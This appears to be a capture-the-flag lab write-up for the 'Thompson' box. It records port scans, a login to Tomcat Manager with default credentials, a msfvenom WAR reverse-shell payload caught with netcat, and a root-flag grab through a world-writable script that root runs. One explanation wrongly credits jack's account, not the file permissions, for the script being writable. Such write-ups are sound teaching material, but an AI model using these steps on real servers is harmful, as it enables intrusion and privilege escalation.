Thompson - wook413

![[Pasted image 20250621214127.png]] --- # Port scanning - Nmap Started off with TCP scan against all 65,535 ports ```bash root@ip-10-10-185-64:~# sudo nmap -sS 10.10.10.115 -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 02:49 BST Nmap scan report for 10.10.10.115 Host is up (0.00042s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 8009/tcp open ajp13 8080/tcp open http-proxy MAC Address: 02:DB:5B:2E:6E:13 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds ``` Another TCP scan against 3 ports found: 22, 8009, and 8080 ```bash root@ip-10-10-185-64:~# nmap -sC -sV 10.10.10.115 -p 22,8009,8080 Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 02:50 BST Nmap scan report for 10.10.10.115 Host is up (0.00018s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA) | 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA) |_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8080/tcp open http Apache Tomcat 8.5.5 |_http-favicon: Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache Tomcat/8.5.5 MAC Address: 02:DB:5B:2E:6E:13 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.39 seconds ``` And lastly, UDP scan against top 1,000 ports ```bash root@ip-10-10-185-64:~# nmap -sU 10.10.10.115 --min-rate 3000 --top-ports 1000 Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 02:58 BST Nmap scan report for 10.10.10.115 Host is up (0.00033s latency). Not shown: 994 open|filtered ports PORT STATE SERVICE 996/udp closed vsinet 1645/udp closed radius 16838/udp closed unknown 17101/udp closed unknown 53838/udp closed unknown 61322/udp closed unknown MAC Address: 02:DB:5B:2E:6E:13 (Unknown) ``` # Footprinting Navigating to `10.10.10.115:8080`, I see an Apache Tomcat website. Clicking on `Manager App`prompts me to enter credentials. ![[Pasted image 20250621205935.png]] Clicking on Cancel takes me to this "401 Unauthorized" page in which you can find `tomcat:s3cret` credentials as an example. ![[Pasted image 20250621210346.png]] successfully logged into `/manager` ![[Pasted image 20250621211325.png]] scrolled down a bit, there's a file upload feature which seems to only take in `.war` files. ![[Pasted image 20250621211305.png]] Made a `.WAR` reverse shell payload with `msfvenom` ```bash root@ip-10-10-185-64:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.185.64 LPORT=1234 -f war -o shell.war Payload size: 1105 bytes Final size of war file: 1105 bytes Saved as: shell.war ``` Uploaded the shell and was able to capture the reverse shell! ```bash root@ip-10-10-185-64:~# nc -lvnp 1234 Listening on 0.0.0.0 1234 Connection received on 10.10.10.115 54468 whoami tomcat id uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat) ``` In the path of `/home/jack`, I found `user.txt` flag! ```bash tomcat@ubuntu:/home/jack$ cat user.txt 3940... ``` # Privilege Escalation Apart from `user.txt`, there are also `id.sh` and `test.txt`. ```bash tomcat@ubuntu:/home/jack$ ls id.sh test.txt user.txt ``` `id.sh` is owned by jack but `test.txt` is owned by root. ```bash tomcat@ubuntu:/home/jack$ ls -l id.sh && ls -l test.txt -rwxrwxrwx 1 jack jack 26 Aug 14 2019 id.sh -rw-r--r-- 1 root root 39 Jun 21 19:29 test.txt ``` Basically, `test.txt` simply displays the contents written in `id.sh`. The actual code resides in the `id.sh` file. ```bash tomcat@ubuntu:/home/jack$ cat id.sh #!/bin/bash id > test.txt ``` ```bash tomcat@ubuntu:/home/jack$ cat test.txt uid=0(root) gid=0(root) groups=0(root) ``` Since the `id.sh` file is owned by jack, whose account we currently have access to, we can modify the file. I replaced the code so that the contents of `root.txt` would be copied to `test.txt`, which is owned by root. ```bash tomcat@ubuntu:/home/jack$ cat id.sh #!/bin/bash cat /root/root.txt > test.txt ``` My theory worked! ```bash tomcat@ubuntu:/home/jack$ cat test.txt d89d... ```